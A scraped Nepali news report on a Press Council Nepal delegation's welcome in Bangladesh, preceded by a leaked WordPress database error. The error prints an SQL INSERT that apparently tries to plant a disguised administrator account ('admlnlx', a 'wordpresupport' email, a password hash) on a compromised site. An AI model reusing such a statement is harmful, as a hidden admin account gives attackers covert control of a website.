WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7KffWICFm4vEv9CZfE/H1XS8ec1ml1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 03:52:55', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर २२–
प्रेस काउन्सिल अफ बंगलादेशको निमन्त्रणामा त्यसतर्फ गएको प्रेस काउन्सिल नेपालको प्रतिनिधिमण्डललाई भव्य स्वागत गरिएको छ ।
२१ गते प्रेस काउन्सिल अफ बंगलादेशका अध्यक्ष मोहम्मद ममताजुद्धिन अहमदले फूल, पुष्पगुच्छाले भ्रमणटोलीको स्वागत गर्नुभएको थियो भने २२ गते आज विशेष भोजको आयोजना गरिएको छ । सो अवसरमा प्रेस काउन्सिल नेपालका अध्यक्ष बोर्णवहादुर कार्कीले निस्वार्थ भावनाले दुईदेशबीच द्विपक्षीय सहकार्य गर्दै प्रगाढ सम्वन्ध विस्तार गर्न सार्कस्तरीय प्रेस काउन्सिलको यथासक्य गठन गरिने प्रक्रियामा सघाउन आग्रह गर्नुभएको थियो । त्यसैगरी भुपरिवेष्ठित देश नेपाललाई बन्दरगाह सुविधा प्रदान गरेकोमा वंगलादेश सरकारलाई धन्यवाद प्रकट गर्नुभएको थियो ।
५ दिने भ्रमणमा रहेको प्रतिनिधिमण्डलमा नेपाल पत्रकार महासंघका अध्यक्ष डा. महेन्द्र विष्ट, सदस्यद्वय किशोर श्रेष्ठ, गोविन्दप्रसाद चौंलागाई, काउन्सिलका मुख्य अधिकृत झविन्द्र भुसालको सहभागिता रहेको छ ।